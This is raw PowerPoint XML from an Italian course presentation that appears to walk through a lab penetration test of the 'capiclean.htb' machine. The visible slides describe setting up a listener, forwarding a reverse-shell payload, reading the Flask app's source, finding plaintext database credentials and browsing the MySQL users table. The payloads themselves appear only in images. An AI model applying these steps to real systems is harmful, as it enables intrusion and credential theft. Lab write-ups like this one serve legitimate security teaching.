                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1900">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tutti i test effettuati sulla macchina in quanto è una macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vulnerabile by design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>e tutto è stato eseguito nei limiti d’azione imposte dal corso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>È fortemente raccomandato essere super user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(root)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> del sistema per imporre dei comandi che verranno illustrati in seguito, non eseguibili in altro modo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Prima ti poter connettersi alla macchina target andiamo ad aggiungere il sito </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>capiclean.htb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> alla lista degli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" i="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>10.10.11.12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" i="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>capiclean.htb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="920989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721946"/>
            <a:ext cx="10611627" cy="1990906"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ct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577738" y="2893475"/>
            <a:ext cx="4425911" cy="3242577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Prima però di inviare il payload assicuriamoci di metterci in ascolto sulla porta specificata nella reverse shell (In questo caso la 8082). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ora effettuiamo il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>forward</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> del payload e se va bene otteniamo la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ReverseShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D9F8D5B-1E90-DA06-8C77-ADA111103D13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="667617" y="3481044"/>
            <a:ext cx="5606956" cy="2058538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4072750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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Target Exploitation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Segnaposto contenuto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129C490A-F0DF-D3E7-D6B8-3F6803618137}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="691079" y="2340131"/>
          <a:ext cx="10325000" cy="3564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1454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7134A1-6E23-4417-8A0E-6B7013EE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82FD622D-988E-4643-87EB-6197BAB53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0017DA54-DDDC-44E6-8AC4-7FDC000A2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2E709A-9270-42A6-8B58-D1F149D2D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07979B-226B-4F37-B9F9-DAAAFCF187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1923EF-C2E0-4CB2-A37D-56251914BE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FC8C6-CA0F-414F-B5D8-A22C3BA186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0A1778-5358-4A84-AFC7-F5FE52170C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CA575A-2DD5-4400-A8EB-CA087B366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FE83E2-842D-4DB0-879B-0AAE74E88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65B4D5-97A8-4B99-95F1-A8ABACD57F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9C1AEC-921E-4B21-AB7C-3B314FAF87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C6C036-973A-4049-A3ED-DBE599BFC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33D27E-05C8-4261-BFB0-C543438143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10A5DC-6FA9-4464-B677-A8EE7C068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4C342D-588F-4B7E-8911-5079C1E27C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3446F-FEE4-48A6-B092-FCA67607A8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7AAF31-1287-4F06-82C2-152B97CE4C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B0E018F-0A4A-4940-A9C5-2F75378781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D144D6-982B-4822-9C5F-D588A3CF3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969311-3C7A-46EE-9348-6B4336641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9FECC74-E0E3-4128-8632-2FA994140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8D280A9-4057-47B5-A9AE-7AF211431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DAC388-396D-47BE-A84F-13F905DE4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C423F5-785F-4726-A136-AFB50AA1E2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18134-78BA-4375-8130-1036457BC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EC74D1-2591-4C00-AADF-5CCDAA556A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C355CE-3A38-42CE-B108-F859C995E1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38FD71-CBEE-4752-81BF-145F91BAE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C40E9D-9C2D-478A-8BD0-FC1623D55A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800592A-3AD4-4CB7-A596-B160E835B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DF9447-BDCC-4AD3-BD3F-6203D64B1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8BF451A-8BE3-4DAE-9731-362B5D5E35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Flowchart: Document 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B135F0A9-346D-45D8-9316-99A6C7776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491298"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D47E8C-E25A-E21F-C355-FF4403B76D56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="60000"/>
          </a:blip>
          <a:srcRect t="24429" r="2" b="20466"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6331" y="-14856"/>
            <a:ext cx="12208610" cy="6424896"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12205236" h="6424896">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12205236" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12205236" y="5218929"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6290213" y="5218929"/>
                  <a:pt x="6105369" y="7085096"/>
                  <a:pt x="548482" y="6174545"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="6078725"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>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10325000" cy="1442463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Target Exploitation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>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340131"/>
            <a:ext cx="9312562" cy="2475557"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Effettuando una semplice ls andiamo a scoprire che all’interno della cartella /opt/app è presente l’applicazione in Python che è in esecuzione sulla porta 80. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, Carattere, schermata, tipografia&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EBA79A7-3CCA-4D37-74CF-27C50765DF6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8580588" y="5640239"/>
            <a:ext cx="2866486" cy="839637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1516012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2805421D-23CB-40F5-9098-D716667E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EBEDFB19-5DE1-4CA8-842F-CF9657C9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04A073-94DC-4578-A9E2-F2E11D914E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F7BBB2-E3AC-457B-807F-64236CF302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853883-33B5-4C34-9FBE-49F74C5076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148E7B-B5D6-4263-9D85-5D3DFB6178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67EC22-EFE1-454E-8FD1-12FFCD9D2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EB4AF-9931-410A-9F68-C24B6C39E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941F79-4D72-496E-AE99-73B9E1F72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4E79B3-CB64-439D-B1FC-FC4BF47CD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92598D1-4713-4DC0-BD6B-7CC594357A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EB19DC-1DB5-4675-A6DE-6360F0AD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05E56D6-1D38-4913-B543-41ECE2C46B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ACC1A-6B97-4B0B-A036-F818906236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197E3E-AC71-447A-A5F1-AC337FD73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37D0DA4-9FA9-4502-8296-6DD8842C3A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A94CC6E-AA45-4AFF-8EC6-17FE421734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30A0C5-0C67-4AC8-9F75-D63277BFF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10410FE-F829-4EB2-98EE-397D51FC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2C1BE1-F256-4B52-BB5D-50C84668FA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104CCA-10BA-45D1-A504-EF3AD7334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E7DBD2-8DAE-45A0-9A8C-331329107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AD51F90-1778-4825-87B9-E04A473A4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B4C11C-68F4-4AAA-B3C6-99B339FD5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F65B701-4451-455A-A72C-968591A58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E9A4D7-E804-4F7D-B46F-9182BE11DE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22ECDE-9CC3-4260-A85A-1575376E7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40BF09-5C37-4ABA-919D-A22281C3A4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CA37BD-68D3-427B-9FDA-2ADAFCF5DC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5F91D5-B215-42B0-81E5-7CE4263BDD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C21ED72-60A2-439D-8DD2-85900BA4CB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853A371-AB64-4677-9E5A-FE61C0E045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ight Triangle 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3093A12-B759-4321-96FD-060689E3A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7291541" y="-28737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8309573" y="837922"/>
            <a:ext cx="4415630" cy="2460770"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Target Exploitation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BB2BD5F-128D-039C-62FE-192E161AE9F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="252891" y="12107"/>
            <a:ext cx="7327078" cy="6824615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3176071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chor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Analizzare il seguente codice sorgente ci dà moliti indizi tra cui: </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La Web App è scritta in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Abbiamo i criteri di sanificazione dei campi di input attraverso la funzione “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Le credenziali del database sono esposte ed in chiaro. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Una volta ottenute queste informazioni cruciali per il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, possiamo procedere accedendo al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4CA517A-D6DE-93D0-1E50-F74CAD64AC4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1131855"/>
            <a:ext cx="6401443" cy="4609038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121511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6" name="Freeform: Shape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E176DC30-5F54-423B-AF50-738BEABE7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490555" y="162759"/>
            <a:ext cx="6857996" cy="6532473"/>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4675998B-83F9-4DD6-A181-01CC6390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 name="Straight Connector 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7203DA02-DFF0-43DA-97F8-713359A5E9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DB5F66-3FA1-4342-A884-49FFC898B0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2E1DE4-95C3-4648-880D-D5F16DA5BE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DE976-09C7-468E-88D4-E653C3B9A9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46834F4-CE01-4256-A71F-E9622367BA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4B1666-CD3C-4141-91C0-782A8C0A79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EB9DED-5756-4349-86C4-BB40C843E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66CDAA-2393-4E50-88AE-4B6DE356D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2ED3B2-4AF6-4D71-AFE0-E628195BE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F8274F-6455-416D-9E21-09DCC607D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4FC2BA-35B4-4272-AE27-2EA963B9C6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5E2C7-38CF-4C4C-BA60-8EBC4C59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A41EEBD-A69D-4000-B18A-0FF9079FF4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674DC2-DB19-4D12-A7CC-A19B45A577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E37544-AEB0-4C32-9AB4-FD8868FBB4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4D92EE-9609-4B42-A0C2-EE8B291A2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4BE4F6-D0F0-4D05-BADF-7BAB738853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022A48-AB28-42C0-99AA-84E9E942A2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E1212E-2DDC-41F9-817C-2B0AF529E0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AC07E3-6FB7-48B5-9418-5D58EC897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112200-C0E8-4E4F-B475-BB0C5619B1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A45913-5C20-4A2E-9401-B69D433BAC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3BFA98-23F1-401A-B615-F706954A49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EE95EF-D097-47D9-98DF-5BA037C497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E5EAA5-1BC5-4C85-85D9-F7BA73476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F5AAC3-E106-4C3A-986B-23C44A9B1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C6582A-5366-4B33-8D40-2B474D8B57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25249E-2F40-425D-A7F1-B7E55EF53C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3EC936-5CFC-4FE5-BCA8-59B3A2EFB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DE7F7A-C490-430C-876F-0349FC8BF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686B4E-119A-4F4A-9392-1F9CFE3BE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Right Triangle 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3730C34-30B8-42E4-824D-F095747C4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5" y="20590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8" y="725951"/>
            <a:ext cx="5398648" cy="1878413"/>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3005"/>
            <a:ext cx="4398756" cy="3260398"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>In questa schermata vediamo che abbiamo a disposizione 3 database di cui uno di nostro interesse ovvero “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>capiclean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Da questa schermata individuiamo la tabella degli utenti che contiene la lista degli utenti. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
